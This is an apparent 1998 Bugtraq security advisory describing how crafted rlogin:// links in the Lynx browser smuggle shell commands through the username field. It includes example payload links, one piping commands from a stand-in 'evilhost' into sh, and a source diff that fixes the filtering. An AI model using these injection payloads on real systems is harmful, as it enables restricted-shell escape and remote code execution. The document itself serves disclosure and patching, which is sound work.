[8583] in bugtraq
Lynx
daemon@ATHENA.MIT.EDU (Artur Grabowski)
Tue Nov 17 12:50:53 1998
Date: Tue, 17 Nov 1998 17:06:00 +0100
Reply-To: art@STACKEN.KTH.SE
From: Artur Grabowski <art@STACKEN.KTH.SE>
To: BUGTRAQ@NETSPACE.ORG
Lynx has a feature that allows trojans.
For users on systems where lynx is the login shell or somehow the only
program allowed to run, the user can obtain a shell by simply "clicking"
a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.
Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh@evilhost.foo">foo</a>. The login shell
(or something similiar) for eviluser@evilhost.foo prints out a few commands
to run on the victim.
The problem is in WWW/Library/Implementation/HTTelnet.c in the function
remote_session. It strips off "bad" characters ('|', ';') from everything
except the username:
/*
* Modified to allow for odd chars in a username only if exists.
* 05-28-94 Lynx 2-3-1 Garrett Arch Blythe
*/
That was a bad decision.
The obvious fix is to be more paranoid than "user friendly".
//art
(diff made to the OpenBSD cvs repository, so the line numbers can be wrong)
Index: HTTelnet.c
===================================================================
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c 1998/03/11 17:47:47 1.1.1.1
+++ HTTelnet.c 1998/11/16 17:01:35
@@ -73,8 +73,7 @@
* *cp=0; / * terminate at any ;,<,>,`,|,",' or space or return
* or tab to prevent security whole
*/
- for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
- cp++) {
+ for(cp = host; *cp != '\0'; cp++) {
if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
*cp != ':' && *cp != '.' && *cp != '@') {
*cp = '\0';
